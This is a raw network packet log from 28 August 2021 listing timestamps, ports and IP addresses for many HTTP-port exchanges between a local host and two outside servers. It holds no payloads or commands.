Aug 28, 2021 00:06:15.064771891 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:15.064824104 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:15.064860106 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:15.064898014 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:15.064940929 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:15.064973116 CEST	49717	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:15.064977884 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:15.065006971 CEST	49717	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:15.065016031 CEST	49717	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:15.065017939 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:15.065046072 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:15.065104008 CEST	49717	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:15.065141916 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:15.065176964 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:15.065222979 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:15.065253973 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:15.065314054 CEST	49717	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:15.065324068 CEST	49717	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:15.190617085 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:15.190670967 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:15.190707922 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:15.190737009 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:15.190783024 CEST	49717	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:15.190783978 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:15.190846920 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:15.190888882 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:15.190905094 CEST	49717	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:15.190913916 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:15.190958023 CEST	49717	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:15.190964937 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:15.191005945 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:15.191050053 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:15.191059113 CEST	49717	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:15.191088915 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:15.191155910 CEST	49717	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:15.191168070 CEST	49717	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:15.191181898 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:15.191222906 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:15.191282034 CEST	80	49717	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:15.191298962 CEST	49717	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:15.336127043 CEST	49717	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:40.022618055 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:40.147839069 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:40.148077965 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:40.273034096 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:40.539211988 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:40.649377108 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:40.773729086 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:40.776309967 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:40.900250912 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:41.168416977 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:41.240237951 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:41.272578955 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:41.272767067 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:41.395390034 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:41.395565987 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:41.401865959 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:41.403142929 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:41.518614054 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:41.532649994 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:41.793859959 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:41.795608044 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:41.806463957 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:41.913350105 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:41.918732882 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:41.919173956 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:42.042363882 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:42.042480946 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:42.043344021 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:42.101011992 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:42.173989058 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:42.226279974 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:42.228207111 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:42.311165094 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:42.352792978 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:42.413856983 CEST	49723	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:42.428162098 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:42.438714027 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:42.442814112 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:42.537198067 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:42.554249048 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:42.561454058 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:42.561690092 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:42.616494894 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:42.683324099 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:42.683540106 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:42.684226036 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:42.725797892 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:42.812917948 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:42.850266933 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:42.850528955 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:42.949615002 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:42.975404024 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:43.037352085 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:43.054327965 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:43.081392050 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:43.178461075 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:43.178595066 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:43.194658995 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:43.241456985 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:43.301949024 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:43.323796034 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:43.324584961 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:43.350855112 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:43.455434084 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:43.475346088 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:43.475486040 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:43.580508947 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:43.602348089 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:43.696463108 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:43.720963001 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:43.819937944 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:43.820991993 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:43.835500002 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:43.876807928 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:43.928000927 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:43.944386005 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:43.965619087 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:43.965969086 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:43.995717049 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:44.097160101 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:44.120085001 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:44.120234966 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:44.213987112 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:44.245218992 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:44.337426901 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:44.365314007 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:44.428030968 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:44.460534096 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:44.461199999 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:44.475924969 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:44.501871109 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:44.585993052 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:44.606245041 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:44.609019995 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:44.616595984 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:44.739588976 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:44.742721081 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:44.742835999 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:44.858036041 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:44.867353916 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:44.928061008 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:45.001122952 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:45.009582996 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:45.116950989 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:45.124243021 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:45.124703884 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:45.142163992 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:45.240560055 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:45.246184111 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:45.246277094 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:45.247621059 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:45.257414103 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:45.376154900 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:45.385560989 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:45.385761976 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:45.430067062 CEST	49723	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:45.515825033 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:45.530988932 CEST	80	49723	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:45.531232119 CEST	49723	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:45.531478882 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:45.531610012 CEST	49723	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:45.611346960 CEST	80	49723	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:45.611437082 CEST	49723	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:45.646918058 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:45.648154020 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:45.693025112 CEST	80	49723	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:45.740586996 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:45.770868063 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:45.770978928 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:45.780677080 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:45.782461882 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:45.885515928 CEST	80	49723	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:45.893721104 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:45.899633884 CEST	49724	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:45.903943062 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:45.911813974 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:45.911932945 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:45.928167105 CEST	49723	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:46.029474020 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:46.029818058 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:46.041419029 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:46.059273958 CEST	80	49723	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:46.060229063 CEST	49723	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:46.073678017 CEST	80	49724	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:46.074038982 CEST	49724	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:46.074325085 CEST	49724	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:46.138406992 CEST	80	49724	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:46.138494015 CEST	49724	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:46.154244900 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:46.166675091 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:46.212208986 CEST	80	49724	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:46.212236881 CEST	80	49724	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:46.212253094 CEST	80	49724	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:46.212322950 CEST	49724	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:46.213980913 CEST	49724	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:46.220107079 CEST	49725	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:46.240675926 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:46.301817894 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:46.317941904 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:46.410401106 CEST	80	49724	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:46.410448074 CEST	80	49725	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:46.410597086 CEST	49725	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:46.410712957 CEST	49725	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:46.425052881 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:46.425257921 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:46.425549030 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:46.428155899 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:46.429582119 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:46.478743076 CEST	80	49725	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:46.478769064 CEST	80	49725	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:46.521425962 CEST	49726	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:46.537559032 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:46.539088964 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:46.549076080 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:46.560528994 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:46.560621977 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:46.598658085 CEST	80	49726	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:46.598777056 CEST	49726	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:46.598917961 CEST	49726	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:46.663657904 CEST	80	49726	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:46.663685083 CEST	80	49726	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:46.665633917 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:46.665714979 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:46.668044090 CEST	49727	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:46.690005064 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:46.747107983 CEST	80	49727	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:46.747251034 CEST	49727	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:46.747426033 CEST	49727	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:46.790128946 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:46.814055920 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:46.815812111 CEST	80	49727	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:46.815891981 CEST	49727	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:46.883445978 CEST	80	49727	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:46.928235054 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:46.929552078 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:46.955878019 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:47.037575006 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:47.052270889 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:47.053000927 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:47.067325115 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:47.070255995 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:47.177747965 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:47.179299116 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:47.202934027 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:47.203052998 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:47.306760073 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:47.306888103 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:47.337428093 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:47.337455988 CEST	80	49727	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:47.428333998 CEST	49727	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:47.436564922 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:47.446979046 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:47.537653923 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:47.554536104 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:47.608779907 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:47.677947998 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:47.678205013 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:47.694952965 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:47.726519108 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:47.740798950 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:47.801376104 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:47.804497004 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:47.857676029 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:47.861557961 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:47.929470062 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:47.929799080 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:47.991364002 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:48.054981947 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:48.075583935 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:48.179693937 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:48.262350082 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:48.302455902 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:48.302968025 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:48.328032017 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:48.367203951 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:48.427460909 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:48.428966045 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:48.445050955 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:48.496670008 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:48.498085976 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:48.570985079 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:48.575015068 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:48.627796888 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:48.700378895 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:48.700766087 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:48.740869999 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:48.804641008 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:48.900506973 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:48.927402973 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:48.927535057 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:48.974042892 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:49.025424957 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:49.037748098 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:49.050050020 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:49.086757898 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:49.154793024 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:49.154905081 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:49.211757898 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:49.211838961 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:49.284071922 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:49.312176943 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:49.336318016 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:49.428432941 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:49.429790974 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:49.552465916 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:49.552573919 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:49.563631058 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:49.610600948 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:49.675693989 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:49.679606915 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:49.715663910 CEST	49727	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:49.726401091 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:49.809034109 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:49.809150934 CEST	49715	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:49.848253965 CEST	49728	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:49.850986958 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:49.851135969 CEST	49716	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:49.938508987 CEST	80	49715	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:49.951251030 CEST	80	49714	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:49.976749897 CEST	80	49716	167.88.15.115	192.168.2.3
Aug 28, 2021 00:06:50.027467012 CEST	80	49728	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:50.029405117 CEST	49728	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:50.029660940 CEST	49728	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:50.037844896 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:50.086863995 CEST	49714	80	192.168.2.3	167.88.15.115
Aug 28, 2021 00:06:50.099816084 CEST	80	49728	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:50.099925041 CEST	49728	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:50.193424940 CEST	80	49728	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:50.196497917 CEST	80	49728	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:50.196542978 CEST	80	49728	5.254.118.226	192.168.2.3
Aug 28, 2021 00:06:50.196649075 CEST	49728	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:06:50.197091103 CEST	49728	80	192.168.2.3	5.254.118.226
